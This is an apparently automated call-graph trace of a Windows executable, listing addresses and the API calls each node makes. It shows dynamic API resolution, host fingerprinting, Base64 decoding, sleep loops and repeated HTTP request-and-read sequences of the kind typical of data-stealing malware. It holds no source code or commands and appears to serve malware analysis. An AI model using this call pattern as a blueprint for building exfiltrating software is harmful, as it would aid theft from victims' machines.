13956->13957 13958 1c29a2 13957->13958 13959 1c45c0 2 API calls 13958->13959 13960 1c29bb 13959->13960 13961 1c45c0 2 API calls 13960->13961 13962 1c29d4 13961->13962 13963 1c45c0 2 API calls 13962->13963 13964 1c29ed 13963->13964 13965 1c45c0 2 API calls 13964->13965 13966 1c2a06 13965->13966 13967 1c45c0 2 API calls 13966->13967 13968 1c2a1f 13967->13968 13969 1c45c0 2 API calls 13968->13969 13970 1c2a38 13969->13970 13971 1c45c0 2 API calls 13970->13971 13972 1c2a51 13971->13972 13973 1c45c0 2 API calls 13972->13973 13974 1c2a6a 13973->13974 13975 1c45c0 2 API calls 13974->13975 13976 1c2a83 13975->13976 13977 1c45c0 2 API calls 13976->13977 13978 1c2a9c 13977->13978 13979 1c45c0 2 API calls 13978->13979 13980 1c2ab5 13979->13980 13981 1c45c0 2 API calls 13980->13981 13982 1c2ace 13981->13982 13983 1c45c0 2 API calls 13982->13983 13984 1c2ae7 13983->13984 13985 1c45c0 2 API calls 13984->13985 13986 1c2b00 13985->13986 13987 1c45c0 2 API calls 13986->13987 13988 1c2b19 13987->13988 13989 1c45c0 2 API calls 13988->13989 13990 1c2b32 13989->13990 13991 1c45c0 2 API calls 13990->13991 13992 1c2b4b 13991->13992 13993 1c45c0 2 API calls 13992->13993 13994 1c2b64 13993->13994 13995 1c45c0 2 API calls 13994->13995 13996 1c2b7d 13995->13996 13997 1c45c0 2 API calls 13996->13997 13998 1c2b96 13997->13998 13999 1c45c0 2 API calls 13998->13999 14000 1c2baf 13999->14000 14001 1c45c0 2 API calls 14000->14001 14002 1c2bc8 14001->14002 14003 1c45c0 2 API calls 14002->14003 14004 1c2be1 14003->14004 14005 1c45c0 2 API calls 14004->14005 14006 1c2bfa 14005->14006 14007 1c45c0 2 API calls 14006->14007 14008 1c2c13 14007->14008 14009 1c45c0 2 API calls 14008->14009 14010 1c2c2c 14009->14010 14011 1c45c0 2 API calls 14010->14011 14012 1c2c45 14011->14012 14013 1c45c0 2 API calls 14012->14013 14014 1c2c5e 14013->14014 14015 1c45c0 2 API calls 14014->14015 14016 1c2c77 14015->14016 14017 1c45c0 2 API calls 14016->14017 14018 1c2c90 14017->14018 14019 1c45c0 2 API calls 14018->14019 
14020 1c2ca9 14019->14020 14021 1c45c0 2 API calls 14020->14021 14022 1c2cc2 14021->14022 14023 1c45c0 2 API calls 14022->14023 14024 1c2cdb 14023->14024 14025 1c45c0 2 API calls 14024->14025 14026 1c2cf4 14025->14026 14027 1c45c0 2 API calls 14026->14027 14028 1c2d0d 14027->14028 14029 1c45c0 2 API calls 14028->14029 14030 1c2d26 14029->14030 14031 1c45c0 2 API calls 14030->14031 14032 1c2d3f 14031->14032 14033 1c45c0 2 API calls 14032->14033 14034 1c2d58 14033->14034 14035 1c45c0 2 API calls 14034->14035 14036 1c2d71 14035->14036 14037 1c45c0 2 API calls 14036->14037 14038 1c2d8a 14037->14038 14039 1c45c0 2 API calls 14038->14039 14040 1c2da3 14039->14040 14041 1c45c0 2 API calls 14040->14041 14042 1c2dbc 14041->14042 14043 1c45c0 2 API calls 14042->14043 14044 1c2dd5 14043->14044 14045 1c45c0 2 API calls 14044->14045 14046 1c2dee 14045->14046 14047 1c45c0 2 API calls 14046->14047 14048 1c2e07 14047->14048 14049 1c45c0 2 API calls 14048->14049 14050 1c2e20 14049->14050 14051 1c45c0 2 API calls 14050->14051 14052 1c2e39 14051->14052 14053 1c45c0 2 API calls 14052->14053 14054 1c2e52 14053->14054 14055 1c45c0 2 API calls 14054->14055 14056 1c2e6b 14055->14056 14057 1c45c0 2 API calls 14056->14057 14058 1c2e84 14057->14058 14059 1c45c0 2 API calls 14058->14059 14060 1c2e9d 14059->14060 14061 1c45c0 2 API calls 14060->14061 14062 1c2eb6 14061->14062 14063 1c45c0 2 API calls 14062->14063 14064 1c2ecf 14063->14064 14065 1c45c0 2 API calls 14064->14065 14066 1c2ee8 14065->14066 14067 1c45c0 2 API calls 14066->14067 14068 1c2f01 14067->14068 14069 1c45c0 2 API calls 14068->14069 14070 1c2f1a 14069->14070 14071 1c45c0 2 API calls 14070->14071 14072 1c2f33 14071->14072 14073 1c45c0 2 API calls 14072->14073 14074 1c2f4c 14073->14074 14075 1c45c0 2 API calls 14074->14075 14076 1c2f65 14075->14076 14077 1c45c0 2 API calls 14076->14077 14078 1c2f7e 14077->14078 14079 1c45c0 2 API calls 14078->14079 14080 1c2f97 14079->14080 14081 1c45c0 2 API calls 14080->14081 14082 1c2fb0 
14081->14082 14083 1c45c0 2 API calls 14082->14083 14084 1c2fc9 14083->14084 14085 1c45c0 2 API calls 14084->14085 14086 1c2fe2 14085->14086 14087 1c45c0 2 API calls 14086->14087 14088 1c2ffb 14087->14088 14089 1c45c0 2 API calls 14088->14089 14090 1c3014 14089->14090 14091 1c45c0 2 API calls 14090->14091 14092 1c302d 14091->14092 14093 1c45c0 2 API calls 14092->14093 14094 1c3046 14093->14094 14095 1c45c0 2 API calls 14094->14095 14096 1c305f 14095->14096 14097 1c45c0 2 API calls 14096->14097 14098 1c3078 14097->14098 14099 1c45c0 2 API calls 14098->14099 14100 1c3091 14099->14100 14101 1c45c0 2 API calls 14100->14101 14102 1c30aa 14101->14102 14103 1c45c0 2 API calls 14102->14103 14104 1c30c3 14103->14104 14105 1c45c0 2 API calls 14104->14105 14106 1c30dc 14105->14106 14107 1c45c0 2 API calls 14106->14107 14108 1c30f5 14107->14108 14109 1c45c0 2 API calls 14108->14109 14110 1c310e 14109->14110 14111 1c45c0 2 API calls 14110->14111 14112 1c3127 14111->14112 14113 1c45c0 2 API calls 14112->14113 14114 1c3140 14113->14114 14115 1c45c0 2 API calls 14114->14115 14116 1c3159 14115->14116 14117 1c45c0 2 API calls 14116->14117 14118 1c3172 14117->14118 14119 1c45c0 2 API calls 14118->14119 14120 1c318b 14119->14120 14121 1c45c0 2 API calls 14120->14121 14122 1c31a4 14121->14122 14123 1c45c0 2 API calls 14122->14123 14124 1c31bd 14123->14124 14125 1c45c0 2 API calls 14124->14125 14126 1c31d6 14125->14126 14127 1c45c0 2 API calls 14126->14127 14128 1c31ef 14127->14128 14129 1c45c0 2 API calls 14128->14129 14130 1c3208 14129->14130 14131 1c45c0 2 API calls 14130->14131 14132 1c3221 14131->14132 14133 1c45c0 2 API calls 14132->14133 14134 1c323a 14133->14134 14135 1c45c0 2 API calls 14134->14135 14136 1c3253 14135->14136 14137 1c45c0 2 API calls 14136->14137 14138 1c326c 14137->14138 14139 1c45c0 2 API calls 14138->14139 14140 1c3285 14139->14140 14141 1c45c0 2 API calls 14140->14141 14142 1c329e 14141->14142 14143 1c45c0 2 API calls 14142->14143 14144 1c32b7 14143->14144 
14145 1c45c0 2 API calls 14144->14145 14146 1c32d0 14145->14146 14147 1c45c0 2 API calls 14146->14147 14148 1c32e9 14147->14148 14149 1c45c0 2 API calls 14148->14149 14150 1c3302 14149->14150 14151 1c45c0 2 API calls 14150->14151 14152 1c331b 14151->14152 14153 1c45c0 2 API calls 14152->14153 14154 1c3334 14153->14154 14155 1c45c0 2 API calls 14154->14155 14156 1c334d 14155->14156 14157 1c45c0 2 API calls 14156->14157 14158 1c3366 14157->14158 14159 1c45c0 2 API calls 14158->14159 14160 1c337f 14159->14160 14161 1c45c0 2 API calls 14160->14161 14162 1c3398 14161->14162 14163 1c45c0 2 API calls 14162->14163 14164 1c33b1 14163->14164 14165 1c45c0 2 API calls 14164->14165 14166 1c33ca 14165->14166 14167 1c45c0 2 API calls 14166->14167 14168 1c33e3 14167->14168 14169 1c45c0 2 API calls 14168->14169 14170 1c33fc 14169->14170 14171 1c45c0 2 API calls 14170->14171 14172 1c3415 14171->14172 14173 1c45c0 2 API calls 14172->14173 14174 1c342e 14173->14174 14175 1c45c0 2 API calls 14174->14175 14176 1c3447 14175->14176 14177 1c45c0 2 API calls 14176->14177 14178 1c3460 14177->14178 14179 1c45c0 2 API calls 14178->14179 14180 1c3479 14179->14180 14181 1c45c0 2 API calls 14180->14181 14182 1c3492 14181->14182 14183 1c45c0 2 API calls 14182->14183 14184 1c34ab 14183->14184 14185 1c45c0 2 API calls 14184->14185 14186 1c34c4 14185->14186 14187 1c45c0 2 API calls 14186->14187 14188 1c34dd 14187->14188 14189 1c45c0 2 API calls 14188->14189 14190 1c34f6 14189->14190 14191 1c45c0 2 API calls 14190->14191 14192 1c350f 14191->14192 14193 1c45c0 2 API calls 14192->14193 14194 1c3528 14193->14194 14195 1c45c0 2 API calls 14194->14195 14196 1c3541 14195->14196 14197 1c45c0 2 API calls 14196->14197 14198 1c355a 14197->14198 14199 1c45c0 2 API calls 14198->14199 14200 1c3573 14199->14200 14201 1c45c0 2 API calls 14200->14201 14202 1c358c 14201->14202 14203 1c45c0 2 API calls 14202->14203 14204 1c35a5 14203->14204 14205 1c45c0 2 API calls 14204->14205 14206 1c35be 14205->14206 14207 1c45c0 2 
API calls 14206->14207 14208 1c35d7 14207->14208 14209 1c45c0 2 API calls 14208->14209 14210 1c35f0 14209->14210 14211 1c45c0 2 API calls 14210->14211 14212 1c3609 14211->14212 14213 1c45c0 2 API calls 14212->14213 14214 1c3622 14213->14214 14215 1c45c0 2 API calls 14214->14215 14216 1c363b 14215->14216 14217 1c45c0 2 API calls 14216->14217 14218 1c3654 14217->14218 14219 1c45c0 2 API calls 14218->14219 14220 1c366d 14219->14220 14221 1c45c0 2 API calls 14220->14221 14222 1c3686 14221->14222 14223 1c45c0 2 API calls 14222->14223 14224 1c369f 14223->14224 14225 1c45c0 2 API calls 14224->14225 14226 1c36b8 14225->14226 14227 1c45c0 2 API calls 14226->14227 14228 1c36d1 14227->14228 14229 1c45c0 2 API calls 14228->14229 14230 1c36ea 14229->14230 14231 1c45c0 2 API calls 14230->14231 14232 1c3703 14231->14232 14233 1c45c0 2 API calls 14232->14233 14234 1c371c 14233->14234 14235 1c45c0 2 API calls 14234->14235 14236 1c3735 14235->14236 14237 1c45c0 2 API calls 14236->14237 14238 1c374e 14237->14238 14239 1c45c0 2 API calls 14238->14239 14240 1c3767 14239->14240 14241 1c45c0 2 API calls 14240->14241 14242 1c3780 14241->14242 14243 1c45c0 2 API calls 14242->14243 14244 1c3799 14243->14244 14245 1c45c0 2 API calls 14244->14245 14246 1c37b2 14245->14246 14247 1c45c0 2 API calls 14246->14247 14248 1c37cb 14247->14248 14249 1c45c0 2 API calls 14248->14249 14250 1c37e4 14249->14250 14251 1c45c0 2 API calls 14250->14251 14252 1c37fd 14251->14252 14253 1c45c0 2 API calls 14252->14253 14254 1c3816 14253->14254 14255 1c45c0 2 API calls 14254->14255 14256 1c382f 14255->14256 14257 1c45c0 2 API calls 14256->14257 14258 1c3848 14257->14258 14259 1c45c0 2 API calls 14258->14259 14260 1c3861 14259->14260 14261 1c45c0 2 API calls 14260->14261 14262 1c387a 14261->14262 14263 1c45c0 2 API calls 14262->14263 14264 1c3893 14263->14264 14265 1c45c0 2 API calls 14264->14265 14266 1c38ac 14265->14266 14267 1c45c0 2 API calls 14266->14267 14268 1c38c5 14267->14268 14269 1c45c0 2 API calls 
14268->14269 14270 1c38de 14269->14270 14271 1c45c0 2 API calls 14270->14271 14272 1c38f7 14271->14272 14273 1c45c0 2 API calls 14272->14273 14274 1c3910 14273->14274 14275 1c45c0 2 API calls 14274->14275 14276 1c3929 14275->14276 14277 1c45c0 2 API calls 14276->14277 14278 1c3942 14277->14278 14279 1c45c0 2 API calls 14278->14279 14280 1c395b 14279->14280 14281 1c45c0 2 API calls 14280->14281 14282 1c3974 14281->14282 14283 1c45c0 2 API calls 14282->14283 14284 1c398d 14283->14284 14285 1c45c0 2 API calls 14284->14285 14286 1c39a6 14285->14286 14287 1c45c0 2 API calls 14286->14287 14288 1c39bf 14287->14288 14289 1c45c0 2 API calls 14288->14289 14290 1c39d8 14289->14290 14291 1c45c0 2 API calls 14290->14291 14292 1c39f1 14291->14292 14293 1c45c0 2 API calls 14292->14293 14294 1c3a0a 14293->14294 14295 1c45c0 2 API calls 14294->14295 14296 1c3a23 14295->14296 14297 1c45c0 2 API calls 14296->14297 14298 1c3a3c 14297->14298 14299 1c45c0 2 API calls 14298->14299 14300 1c3a55 14299->14300 14301 1c45c0 2 API calls 14300->14301 14302 1c3a6e 14301->14302 14303 1c45c0 2 API calls 14302->14303 14304 1c3a87 14303->14304 14305 1c45c0 2 API calls 14304->14305 14306 1c3aa0 14305->14306 14307 1c45c0 2 API calls 14306->14307 14308 1c3ab9 14307->14308 14309 1c45c0 2 API calls 14308->14309 14310 1c3ad2 14309->14310 14311 1c45c0 2 API calls 14310->14311 14312 1c3aeb 14311->14312 14313 1c45c0 2 API calls 14312->14313 14314 1c3b04 14313->14314 14315 1c45c0 2 API calls 14314->14315 14316 1c3b1d 14315->14316 14317 1c45c0 2 API calls 14316->14317 14318 1c3b36 14317->14318 14319 1c45c0 2 API calls 14318->14319 14320 1c3b4f 14319->14320 14321 1c45c0 2 API calls 14320->14321 14322 1c3b68 14321->14322 14323 1c45c0 2 API calls 14322->14323 14324 1c3b81 14323->14324 14325 1c45c0 2 API calls 14324->14325 14326 1c3b9a 14325->14326 14327 1c45c0 2 API calls 14326->14327 14328 1c3bb3 14327->14328 14329 1c45c0 2 API calls 14328->14329 14330 1c3bcc 14329->14330 14331 1c45c0 2 API calls 14330->14331 
14332 1c3be5 14331->14332 14333 1c45c0 2 API calls 14332->14333 14334 1c3bfe 14333->14334 14335 1c45c0 2 API calls 14334->14335 14336 1c3c17 14335->14336 14337 1c45c0 2 API calls 14336->14337 14338 1c3c30 14337->14338 14339 1c45c0 2 API calls 14338->14339 14340 1c3c49 14339->14340 14341 1c45c0 2 API calls 14340->14341 14342 1c3c62 14341->14342 14343 1c45c0 2 API calls 14342->14343 14344 1c3c7b 14343->14344 14345 1c45c0 2 API calls 14344->14345 14346 1c3c94 14345->14346 14347 1c45c0 2 API calls 14346->14347 14348 1c3cad 14347->14348 14349 1c45c0 2 API calls 14348->14349 14350 1c3cc6 14349->14350 14351 1c45c0 2 API calls 14350->14351 14352 1c3cdf 14351->14352 14353 1c45c0 2 API calls 14352->14353 14354 1c3cf8 14353->14354 14355 1c45c0 2 API calls 14354->14355 14356 1c3d11 14355->14356 14357 1c45c0 2 API calls 14356->14357 14358 1c3d2a 14357->14358 14359 1c45c0 2 API calls 14358->14359 14360 1c3d43 14359->14360 14361 1c45c0 2 API calls 14360->14361 14362 1c3d5c 14361->14362 14363 1c45c0 2 API calls 14362->14363 14364 1c3d75 14363->14364 14365 1c45c0 2 API calls 14364->14365 14366 1c3d8e 14365->14366 14367 1c45c0 2 API calls 14366->14367 14368 1c3da7 14367->14368 14369 1c45c0 2 API calls 14368->14369 14370 1c3dc0 14369->14370 14371 1c45c0 2 API calls 14370->14371 14372 1c3dd9 14371->14372 14373 1c45c0 2 API calls 14372->14373 14374 1c3df2 14373->14374 14375 1c45c0 2 API calls 14374->14375 14376 1c3e0b 14375->14376 14377 1c45c0 2 API calls 14376->14377 14378 1c3e24 14377->14378 14379 1c45c0 2 API calls 14378->14379 14380 1c3e3d 14379->14380 14381 1c45c0 2 API calls 14380->14381 14382 1c3e56 14381->14382 14383 1c45c0 2 API calls 14382->14383 14384 1c3e6f 14383->14384 14385 1c45c0 2 API calls 14384->14385 14386 1c3e88 14385->14386 14387 1c45c0 2 API calls 14386->14387 14388 1c3ea1 14387->14388 14389 1c45c0 2 API calls 14388->14389 14390 1c3eba 14389->14390 14391 1c45c0 2 API calls 14390->14391 14392 1c3ed3 14391->14392 14393 1c45c0 2 API calls 14392->14393 14394 1c3eec 
14393->14394 14395 1c45c0 2 API calls 14394->14395 14396 1c3f05 14395->14396 14397 1c45c0 2 API calls 14396->14397 14398 1c3f1e 14397->14398 14399 1c45c0 2 API calls 14398->14399 14400 1c3f37 14399->14400 14401 1c45c0 2 API calls 14400->14401 14402 1c3f50 14401->14402 14403 1c45c0 2 API calls 14402->14403 14404 1c3f69 14403->14404 14405 1c45c0 2 API calls 14404->14405 14406 1c3f82 14405->14406 14407 1c45c0 2 API calls 14406->14407 14408 1c3f9b 14407->14408 14409 1c45c0 2 API calls 14408->14409 14410 1c3fb4 14409->14410 14411 1c45c0 2 API calls 14410->14411 14412 1c3fcd 14411->14412 14413 1c45c0 2 API calls 14412->14413 14414 1c3fe6 14413->14414 14415 1c45c0 2 API calls 14414->14415 14416 1c3fff 14415->14416 14417 1c45c0 2 API calls 14416->14417 14418 1c4018 14417->14418 14419 1c45c0 2 API calls 14418->14419 14420 1c4031 14419->14420 14421 1c45c0 2 API calls 14420->14421 14422 1c404a 14421->14422 14423 1c45c0 2 API calls 14422->14423 14424 1c4063 14423->14424 14425 1c45c0 2 API calls 14424->14425 14426 1c407c 14425->14426 14427 1c45c0 2 API calls 14426->14427 14428 1c4095 14427->14428 14429 1c45c0 2 API calls 14428->14429 14430 1c40ae 14429->14430 14431 1c45c0 2 API calls 14430->14431 14432 1c40c7 14431->14432 14433 1c45c0 2 API calls 14432->14433 14434 1c40e0 14433->14434 14435 1c45c0 2 API calls 14434->14435 14436 1c40f9 14435->14436 14437 1c45c0 2 API calls 14436->14437 14438 1c4112 14437->14438 14439 1c45c0 2 API calls 14438->14439 14440 1c412b 14439->14440 14441 1c45c0 2 API calls 14440->14441 14442 1c4144 14441->14442 14443 1c45c0 2 API calls 14442->14443 14444 1c415d 14443->14444 14445 1c45c0 2 API calls 14444->14445 14446 1c4176 14445->14446 14447 1c45c0 2 API calls 14446->14447 14448 1c418f 14447->14448 14449 1c45c0 2 API calls 14448->14449 14450 1c41a8 14449->14450 14451 1c45c0 2 API calls 14450->14451 14452 1c41c1 14451->14452 14453 1c45c0 2 API calls 14452->14453 14454 1c41da 14453->14454 14455 1c45c0 2 API calls 14454->14455 14456 1c41f3 14455->14456 
14457 1c45c0 2 API calls 14456->14457 14458 1c420c 14457->14458 14459 1c45c0 2 API calls 14458->14459 14460 1c4225 14459->14460 14461 1c45c0 2 API calls 14460->14461 14462 1c423e 14461->14462 14463 1c45c0 2 API calls 14462->14463 14464 1c4257 14463->14464 14465 1c45c0 2 API calls 14464->14465 14466 1c4270 14465->14466 14467 1c45c0 2 API calls 14466->14467 14468 1c4289 14467->14468 14469 1c45c0 2 API calls 14468->14469 14470 1c42a2 14469->14470 14471 1c45c0 2 API calls 14470->14471 14472 1c42bb 14471->14472 14473 1c45c0 2 API calls 14472->14473 14474 1c42d4 14473->14474 14475 1c45c0 2 API calls 14474->14475 14476 1c42ed 14475->14476 14477 1c45c0 2 API calls 14476->14477 14478 1c4306 14477->14478 14479 1c45c0 2 API calls 14478->14479 14480 1c431f 14479->14480 14481 1c45c0 2 API calls 14480->14481 14482 1c4338 14481->14482 14483 1c45c0 2 API calls 14482->14483 14484 1c4351 14483->14484 14485 1c45c0 2 API calls 14484->14485 14486 1c436a 14485->14486 14487 1c45c0 2 API calls 14486->14487 14488 1c4383 14487->14488 14489 1c45c0 2 API calls 14488->14489 14490 1c439c 14489->14490 14491 1c45c0 2 API calls 14490->14491 14492 1c43b5 14491->14492 14493 1c45c0 2 API calls 14492->14493 14494 1c43ce 14493->14494 14495 1c45c0 2 API calls 14494->14495 14496 1c43e7 14495->14496 14497 1c45c0 2 API calls 14496->14497 14498 1c4400 14497->14498 14499 1c45c0 2 API calls 14498->14499 14500 1c4419 14499->14500 14501 1c45c0 2 API calls 14500->14501 14502 1c4432 14501->14502 14503 1c45c0 2 API calls 14502->14503 14504 1c444b 14503->14504 14505 1c45c0 2 API calls 14504->14505 14506 1c4464 14505->14506 14507 1c45c0 2 API calls 14506->14507 14508 1c447d 14507->14508 14509 1c45c0 2 API calls 14508->14509 14510 1c4496 14509->14510 14511 1c45c0 2 API calls 14510->14511 14512 1c44af 14511->14512 14513 1c45c0 2 API calls 14512->14513 14514 1c44c8 14513->14514 14515 1c45c0 2 API calls 14514->14515 14516 1c44e1 14515->14516 14517 1c45c0 2 API calls 14516->14517 14518 1c44fa 14517->14518 14519 1c45c0 2 
API calls 14518->14519 14520 1c4513 14519->14520 14521 1c45c0 2 API calls 14520->14521 14522 1c452c 14521->14522 14523 1c45c0 2 API calls 14522->14523 14524 1c4545 14523->14524 14525 1c45c0 2 API calls 14524->14525 14526 1c455e 14525->14526 14527 1c45c0 2 API calls 14526->14527 14528 1c4577 14527->14528 14529 1c45c0 2 API calls 14528->14529 14530 1c4590 14529->14530 14531 1c45c0 2 API calls 14530->14531 14532 1c45a9 14531->14532 14533 1d9c10 14532->14533 14534 1da036 8 API calls 14533->14534 14535 1d9c20 43 API calls 14533->14535 14536 1da0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14534->14536 14537 1da146 14534->14537 14535->14534 14536->14537 14538 1da216 14537->14538 14539 1da153 8 API calls 14537->14539 14540 1da21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14538->14540 14541 1da298 14538->14541 14539->14538 14540->14541 14542 1da2a5 6 API calls 14541->14542 14543 1da337 14541->14543 14542->14543 14544 1da41f 14543->14544 14545 1da344 9 API calls 14543->14545 14546 1da428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14544->14546 14547 1da4a2 14544->14547 14545->14544 14546->14547 14548 1da4dc 14547->14548 14549 1da4ab GetProcAddress GetProcAddress 14547->14549 14550 1da515 14548->14550 14551 1da4e5 GetProcAddress GetProcAddress 14548->14551 14549->14548 14552 1da612 14550->14552 14553 1da522 10 API calls 14550->14553 14551->14550 14554 1da67d 14552->14554 14555 1da61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14552->14555 14553->14552 14556 1da69e 14554->14556 14557 1da686 GetProcAddress 14554->14557 14555->14554 14558 1d5ca3 14556->14558 14559 1da6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14556->14559 14557->14556 14560 1c1590 14558->14560 14559->14558 15679 1c1670 14560->15679 14563 1da7a0 lstrcpy 14564 1c15b5 14563->14564 14565 1da7a0 lstrcpy 14564->14565 14566 1c15c7 14565->14566 14567 1da7a0 lstrcpy 14566->14567 14568 
1c15d9 14567->14568 14569 1da7a0 lstrcpy 14568->14569 14570 1c1663 14569->14570 14571 1d5510 14570->14571 14572 1d5521 14571->14572 14573 1da820 2 API calls 14572->14573 14574 1d552e 14573->14574 14575 1da820 2 API calls 14574->14575 14576 1d553b 14575->14576 14577 1da820 2 API calls 14576->14577 14578 1d5548 14577->14578 14579 1da740 lstrcpy 14578->14579 14580 1d5555 14579->14580 14581 1da740 lstrcpy 14580->14581 14582 1d5562 14581->14582 14583 1da740 lstrcpy 14582->14583 14584 1d556f 14583->14584 14585 1da740 lstrcpy 14584->14585 14624 1d557c 14585->14624 14586 1c1590 lstrcpy 14586->14624 14587 1d52c0 25 API calls 14587->14624 14588 1d5643 StrCmpCA 14588->14624 14589 1d56a0 StrCmpCA 14590 1d57dc 14589->14590 14589->14624 14591 1da8a0 lstrcpy 14590->14591 14592 1d57e8 14591->14592 14594 1da820 2 API calls 14592->14594 14593 1da820 lstrlen lstrcpy 14593->14624 14595 1d57f6 14594->14595 14598 1da820 2 API calls 14595->14598 14596 1d5856 StrCmpCA 14597 1d5991 14596->14597 14596->14624 14599 1da8a0 lstrcpy 14597->14599 14600 1d5805 14598->14600 14601 1d599d 14599->14601 14602 1c1670 lstrcpy 14600->14602 14604 1da820 2 API calls 14601->14604 14621 1d5811 14602->14621 14603 1da740 lstrcpy 14603->14624 14606 1d59ab 14604->14606 14605 1d5a0b StrCmpCA 14607 1d5a28 14605->14607 14608 1d5a16 Sleep 14605->14608 14609 1da820 2 API calls 14606->14609 14610 1da8a0 lstrcpy 14607->14610 14608->14624 14611 1d59ba 14609->14611 14613 1d5a34 14610->14613 14612 1c1670 lstrcpy 14611->14612 14612->14621 14614 1da820 2 API calls 14613->14614 14615 1d5a43 14614->14615 14617 1da820 2 API calls 14615->14617 14616 1d51f0 20 API calls 14616->14624 14618 1d5a52 14617->14618 14620 1c1670 lstrcpy 14618->14620 14619 1d578a StrCmpCA 14619->14624 14620->14621 14621->13678 14622 1d593f StrCmpCA 14622->14624 14623 1da7a0 lstrcpy 14623->14624 14624->14586 14624->14587 14624->14588 14624->14589 14624->14593 14624->14596 14624->14603 14624->14605 14624->14616 14624->14619 14624->14622 14624->14623 14625 
1da8a0 lstrcpy 14624->14625 14625->14624 14627 1d754c 14626->14627 14628 1d7553 GetVolumeInformationA 14626->14628 14627->14628 14629 1d7591 14628->14629 14630 1d75fc GetProcessHeap RtlAllocateHeap 14629->14630 14631 1d7619 14630->14631 14632 1d7628 wsprintfA 14630->14632 14633 1da740 lstrcpy 14631->14633 14634 1da740 lstrcpy 14632->14634 14635 1d5da7 14633->14635 14634->14635 14635->13699 14637 1da7a0 lstrcpy 14636->14637 14638 1c4899 14637->14638 15688 1c47b0 14638->15688 14640 1c48a5 14641 1da740 lstrcpy 14640->14641 14642 1c48d7 14641->14642 14643 1da740 lstrcpy 14642->14643 14644 1c48e4 14643->14644 14645 1da740 lstrcpy 14644->14645 14646 1c48f1 14645->14646 14647 1da740 lstrcpy 14646->14647 14648 1c48fe 14647->14648 14649 1da740 lstrcpy 14648->14649 14650 1c490b InternetOpenA StrCmpCA 14649->14650 14651 1c4944 14650->14651 14652 1c4ecb InternetCloseHandle 14651->14652 15694 1d8b60 14651->15694 14653 1c4ee8 14652->14653 15709 1c9ac0 CryptStringToBinaryA 14653->15709 14655 1c4963 15702 1da920 14655->15702 14658 1c4976 14660 1da8a0 lstrcpy 14658->14660 14665 1c497f 14660->14665 14661 1da820 2 API calls 14662 1c4f05 14661->14662 14663 1da9b0 4 API calls 14662->14663 14666 1c4f1b 14663->14666 14664 1c4f27 ctype 14667 1da7a0 lstrcpy 14664->14667 14669 1da9b0 4 API calls 14665->14669 14668 1da8a0 lstrcpy 14666->14668 14680 1c4f57 14667->14680 14668->14664 14670 1c49a9 14669->14670 14671 1da8a0 lstrcpy 14670->14671 14672 1c49b2 14671->14672 14673 1da9b0 4 API calls 14672->14673 14674 1c49d1 14673->14674 14675 1da8a0 lstrcpy 14674->14675 14676 1c49da 14675->14676 14677 1da920 3 API calls 14676->14677 14678 1c49f8 14677->14678 14679 1da8a0 lstrcpy 14678->14679 14681 1c4a01 14679->14681 14680->13702 14682 1da9b0 4 API calls 14681->14682 14683 1c4a20 14682->14683 14684 1da8a0 lstrcpy 14683->14684 14685 1c4a29 14684->14685 14686 1da9b0 4 API calls 14685->14686 14687 1c4a48 14686->14687 14688 1da8a0 lstrcpy 14687->14688 14689 1c4a51 14688->14689 14690 1da9b0 4 API calls 
14689->14690 14691 1c4a7d 14690->14691 14692 1da920 3 API calls 14691->14692 14693 1c4a84 14692->14693 14694 1da8a0 lstrcpy 14693->14694 14695 1c4a8d 14694->14695 14696 1c4aa3 InternetConnectA 14695->14696 14696->14652 14697 1c4ad3 HttpOpenRequestA 14696->14697 14699 1c4ebe InternetCloseHandle 14697->14699 14700 1c4b28 14697->14700 14699->14652 14701 1da9b0 4 API calls 14700->14701 14702 1c4b3c 14701->14702 14703 1da8a0 lstrcpy 14702->14703 14704 1c4b45 14703->14704 14705 1da920 3 API calls 14704->14705 14706 1c4b63 14705->14706 14707 1da8a0 lstrcpy 14706->14707 14708 1c4b6c 14707->14708 14709 1da9b0 4 API calls 14708->14709 14710 1c4b8b 14709->14710 14711 1da8a0 lstrcpy 14710->14711 14712 1c4b94 14711->14712 14713 1da9b0 4 API calls 14712->14713 14714 1c4bb5 14713->14714 14715 1da8a0 lstrcpy 14714->14715 14716 1c4bbe 14715->14716 14717 1da9b0 4 API calls 14716->14717 14718 1c4bde 14717->14718 14719 1da8a0 lstrcpy 14718->14719 14720 1c4be7 14719->14720 14721 1da9b0 4 API calls 14720->14721 14722 1c4c06 14721->14722 14723 1da8a0 lstrcpy 14722->14723 14724 1c4c0f 14723->14724 14725 1da920 3 API calls 14724->14725 14726 1c4c2d 14725->14726 14727 1da8a0 lstrcpy 14726->14727 14728 1c4c36 14727->14728 14729 1da9b0 4 API calls 14728->14729 14730 1c4c55 14729->14730 14731 1da8a0 lstrcpy 14730->14731 14732 1c4c5e 14731->14732 14733 1da9b0 4 API calls 14732->14733 14734 1c4c7d 14733->14734 14735 1da8a0 lstrcpy 14734->14735 14736 1c4c86 14735->14736 14737 1da920 3 API calls 14736->14737 14738 1c4ca4 14737->14738 14739 1da8a0 lstrcpy 14738->14739 14740 1c4cad 14739->14740 14741 1da9b0 4 API calls 14740->14741 14742 1c4ccc 14741->14742 14743 1da8a0 lstrcpy 14742->14743 14744 1c4cd5 14743->14744 14745 1da9b0 4 API calls 14744->14745 14746 1c4cf6 14745->14746 14747 1da8a0 lstrcpy 14746->14747 14748 1c4cff 14747->14748 14749 1da9b0 4 API calls 14748->14749 14750 1c4d1f 14749->14750 14751 1da8a0 lstrcpy 14750->14751 14752 1c4d28 14751->14752 14753 1da9b0 4 API calls 14752->14753 
[Call-graph edge list for the 1c4xxx-1daxxx function cluster. The rendered graph is not preserved and the raw node/edge tokens are omitted; the API-bearing nodes recovered from the list are, by address:
• WinINet client: 1c4848 InternetCrackUrlA; 1c51fd and 1c59ee InternetOpenA followed by StrCmpCA; 1c5329 and 1c5b7c InternetConnectA; 1c5359 and 1c5bac HttpOpenRequestA; 1c5e81 lstrlen GetProcessHeap RtlAllocateHeap before the send; 1c4e13 and 1c5f2a HttpSendRequestA; 1c4e32 and 1c5f35 InternetReadFile, each in a loop with 1c4e5e / 1c5f61; 1c4e67 and 1c5f6a InternetCloseHandle; 1c5009 InternetOpenUrlA with 1c502a InternetReadFile and 1c50a0 InternetCloseHandle InternetCloseHandle
